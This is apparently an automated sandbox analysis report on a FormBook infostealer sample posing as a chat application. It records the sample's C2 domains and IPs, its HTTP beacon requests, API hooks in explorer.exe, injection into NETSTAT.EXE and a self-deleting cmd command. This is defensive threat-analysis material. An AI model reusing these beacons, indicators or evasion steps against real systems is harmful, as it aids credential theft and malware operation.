                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1188f80x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x11a0000x1774.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x11c0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x1169500x116a00False0.586243305574data7.05866733506IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0x11a0000x17740x1800False0.446940104167data5.62332883024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x11c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0x11a1300x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4293725196, next used block 4293659660
                                    RT_GROUP_ICON0x11b1d80x14data
                                    RT_VERSION0x11b1ec0x39cdata
                                    RT_MANIFEST0x11b5880x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright Necution 2013
                                    Assembly Version1.4.0.0
                                    InternalNameTimeSpanStyl.exe
                                    FileVersion1.4.0.0
                                    CompanyNameNecution
                                    LegalTrademarksNecution
                                    CommentsAn advanced chat-system for windows.
                                    ProductNameNecu 1.0
                                    ProductVersion1.4.0.0
                                    FileDescriptionNecu
                                    OriginalFilenameTimeSpanStyl.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    07/22/21-10:34:42.416087TCP1201ATTACK-RESPONSES 403 Forbidden804976234.102.136.180192.168.2.4

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 22, 2021 10:34:42.214673996 CEST4976280192.168.2.434.102.136.180
                                    Jul 22, 2021 10:34:42.260234118 CEST804976234.102.136.180192.168.2.4
                                    Jul 22, 2021 10:34:42.266627073 CEST4976280192.168.2.434.102.136.180
                                    Jul 22, 2021 10:34:42.267050028 CEST4976280192.168.2.434.102.136.180
                                    Jul 22, 2021 10:34:42.320919037 CEST804976234.102.136.180192.168.2.4
                                    Jul 22, 2021 10:34:42.416086912 CEST804976234.102.136.180192.168.2.4
                                    Jul 22, 2021 10:34:42.416110992 CEST804976234.102.136.180192.168.2.4
                                    Jul 22, 2021 10:34:42.416554928 CEST4976280192.168.2.434.102.136.180
                                    Jul 22, 2021 10:34:42.416574955 CEST4976280192.168.2.434.102.136.180
                                    Jul 22, 2021 10:34:42.716197014 CEST4976280192.168.2.434.102.136.180
                                    Jul 22, 2021 10:34:42.758176088 CEST804976234.102.136.180192.168.2.4
                                    Jul 22, 2021 10:35:02.692219973 CEST4976380192.168.2.4195.133.60.76
                                    Jul 22, 2021 10:35:02.780270100 CEST8049763195.133.60.76192.168.2.4
                                    Jul 22, 2021 10:35:02.781054020 CEST4976380192.168.2.4195.133.60.76
                                    Jul 22, 2021 10:35:02.781199932 CEST4976380192.168.2.4195.133.60.76
                                    Jul 22, 2021 10:35:02.868103981 CEST8049763195.133.60.76192.168.2.4
                                    Jul 22, 2021 10:35:02.868242979 CEST8049763195.133.60.76192.168.2.4
                                    Jul 22, 2021 10:35:02.868287086 CEST8049763195.133.60.76192.168.2.4
                                    Jul 22, 2021 10:35:02.868462086 CEST4976380192.168.2.4195.133.60.76
                                    Jul 22, 2021 10:35:02.868597984 CEST4976380192.168.2.4195.133.60.76
                                    Jul 22, 2021 10:35:02.955441952 CEST8049763195.133.60.76192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 22, 2021 10:32:50.203171015 CEST5170353192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:50.255491018 CEST53517038.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:51.625560045 CEST6524853192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:51.680830002 CEST5372353192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:51.694895029 CEST53652488.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:51.732728958 CEST53537238.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:51.982875109 CEST6464653192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:52.079874992 CEST53646468.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:52.594449997 CEST6529853192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:52.651686907 CEST53652988.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:53.554028034 CEST5912353192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:53.604470968 CEST53591238.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:53.876652002 CEST5453153192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:53.961410046 CEST53545318.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:54.986707926 CEST4971453192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:55.044718027 CEST53497148.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:56.005220890 CEST5802853192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:56.059371948 CEST53580288.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:57.017580986 CEST5309753192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:57.068203926 CEST53530978.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:58.673908949 CEST4925753192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:58.723504066 CEST53492578.8.8.8192.168.2.4
                                    Jul 22, 2021 10:32:59.916542053 CEST6238953192.168.2.48.8.8.8
                                    Jul 22, 2021 10:32:59.966315031 CEST53623898.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:00.844149113 CEST4991053192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:00.896568060 CEST53499108.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:01.894459963 CEST5585453192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:01.948821068 CEST53558548.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:05.576458931 CEST6454953192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:05.630844116 CEST53645498.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:06.605690002 CEST6315353192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:06.672796965 CEST53631538.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:07.730304956 CEST5299153192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:07.782202959 CEST53529918.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:08.715502024 CEST5370053192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:08.764816999 CEST53537008.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:09.741802931 CEST5172653192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:09.793827057 CEST53517268.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:11.294498920 CEST5679453192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:11.344943047 CEST53567948.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:12.666052103 CEST5653453192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:12.725951910 CEST53565348.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:13.629904985 CEST5662753192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:13.681850910 CEST53566278.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:14.608994961 CEST5662153192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:14.669390917 CEST53566218.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:15.913603067 CEST6311653192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:15.962915897 CEST53631168.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:26.019609928 CEST6407853192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:26.077410936 CEST53640788.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:46.822499990 CEST6480153192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:46.884011030 CEST53648018.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:49.820333958 CEST6172153192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:49.909779072 CEST53617218.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:50.843030930 CEST5125553192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:50.905101061 CEST53512558.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:51.184765100 CEST6152253192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:51.257703066 CEST53615228.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:51.876488924 CEST5233753192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:51.971647978 CEST53523378.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:52.770215988 CEST5504653192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:52.827636957 CEST53550468.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:53.580497026 CEST4961253192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:53.641283989 CEST53496128.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:54.457483053 CEST4928553192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:54.517585993 CEST53492858.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:55.624140978 CEST5060153192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:55.681127071 CEST53506018.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:56.794339895 CEST6087553192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:56.854849100 CEST53608758.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:58.293987036 CEST5644853192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:58.354204893 CEST53564488.8.8.8192.168.2.4
                                    Jul 22, 2021 10:33:58.852503061 CEST5917253192.168.2.48.8.8.8
                                    Jul 22, 2021 10:33:58.909688950 CEST53591728.8.8.8192.168.2.4
                                    Jul 22, 2021 10:34:08.947514057 CEST6242053192.168.2.48.8.8.8
                                    Jul 22, 2021 10:34:09.009040117 CEST53624208.8.8.8192.168.2.4
                                    Jul 22, 2021 10:34:39.449495077 CEST6057953192.168.2.48.8.8.8
                                    Jul 22, 2021 10:34:39.507685900 CEST53605798.8.8.8192.168.2.4
                                    Jul 22, 2021 10:34:41.342482090 CEST5018353192.168.2.48.8.8.8
                                    Jul 22, 2021 10:34:41.408624887 CEST53501838.8.8.8192.168.2.4
                                    Jul 22, 2021 10:34:42.127634048 CEST6153153192.168.2.48.8.8.8
                                    Jul 22, 2021 10:34:42.192308903 CEST53615318.8.8.8192.168.2.4
                                    Jul 22, 2021 10:35:02.627824068 CEST4922853192.168.2.48.8.8.8
                                    Jul 22, 2021 10:35:02.690359116 CEST53492288.8.8.8192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jul 22, 2021 10:34:42.127634048 CEST192.168.2.48.8.8.80xf124Standard query (0)www.thedreamcertificate.comA (IP address)IN (0x0001)
                                    Jul 22, 2021 10:35:02.627824068 CEST192.168.2.48.8.8.80x6600Standard query (0)www.seahorseblast.netA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jul 22, 2021 10:34:42.192308903 CEST8.8.8.8192.168.2.40xf124No error (0)www.thedreamcertificate.comthedreamcertificate.comCNAME (Canonical name)IN (0x0001)
                                    Jul 22, 2021 10:34:42.192308903 CEST8.8.8.8192.168.2.40xf124No error (0)thedreamcertificate.com34.102.136.180A (IP address)IN (0x0001)
                                    Jul 22, 2021 10:35:02.690359116 CEST8.8.8.8192.168.2.40x6600No error (0)www.seahorseblast.netseahorseblast.netCNAME (Canonical name)IN (0x0001)
                                    Jul 22, 2021 10:35:02.690359116 CEST8.8.8.8192.168.2.40x6600No error (0)seahorseblast.net195.133.60.76A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.thedreamcertificate.com
                                    • www.seahorseblast.net

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.44976234.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 22, 2021 10:34:42.267050028 CEST7599OUTGET /kkt/?ibQh=6llLiJzHhP5P5Lj&I48l2h=L0B8w9HUZaOZ7jw4+npXJ0F94zqPsX3Vt6n0qHR8lA3J0yAUFnvUFF5QUXy5W701wjCn HTTP/1.1
                                    Host: www.thedreamcertificate.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Jul 22, 2021 10:34:42.416086912 CEST7599INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 22 Jul 2021 08:34:42 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "60f790d8-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.449763195.133.60.7680C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 22, 2021 10:35:02.781199932 CEST7601OUTGET /kkt/?I48l2h=JgCZg0ECNQCGdZh+l8D79i0V4/Xiha033Hwln1gAEXgZOLyx1jBrHFXC3spPC1oi0umv&ibQh=6llLiJzHhP5P5Lj HTTP/1.1
                                    Host: www.seahorseblast.net
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Jul 22, 2021 10:35:02.868242979 CEST7602INHTTP/1.1 404 Not Found
                                    Date: Thu, 22 Jul 2021 08:35:02 GMT
                                    Server: Apache
                                    X-XSS-Protection: 1; mode=block
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Content-Length: 202
                                    Connection: close
                                    Content-Type: text/html; charset=iso-8859-1
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6b 6b 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /kkt/ was not found on this server.</p></body></html>


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE9
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE9
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE9
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE9

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: 6KdTCZit4e.exe PID: 6568 Parent PID: 5932

                                    General

                                    Start time:10:32:59
                                    Start date:22/07/2021
                                    Path:C:\Users\user\Desktop\6KdTCZit4e.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\6KdTCZit4e.exe'
                                    Imagebase:0x6f0000
                                    File size:1148416 bytes
                                    MD5 hash:ED43FF447CD5486610731A627A930607
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:low

                                    Analysis Process: 6KdTCZit4e.exe PID: 6128 Parent PID: 6568

                                    General

                                    Start time:10:33:29
                                    Start date:22/07/2021
                                    Path:C:\Users\user\Desktop\6KdTCZit4e.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\6KdTCZit4e.exe
                                    Imagebase:0x7b0000
                                    File size:1148416 bytes
                                    MD5 hash:ED43FF447CD5486610731A627A930607
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Analysis Process: explorer.exe PID: 3424 Parent PID: 6128

                                    General

                                    Start time:10:33:32
                                    Start date:22/07/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff6fee60000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: NETSTAT.EXE PID: 6708 Parent PID: 3424

                                    General

                                    Start time:10:33:59
                                    Start date:22/07/2021
                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                    Imagebase:0x200000
                                    File size:32768 bytes
                                    MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    Analysis Process: cmd.exe PID: 4972 Parent PID: 6708

                                    General

                                    Start time:10:34:05
                                    Start date:22/07/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\6KdTCZit4e.exe'
                                    Imagebase:0x11d0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: conhost.exe PID: 6820 Parent PID: 4972

                                    General

                                    Start time:10:34:06
                                    Start date:22/07/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff724c50000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                    Reset < >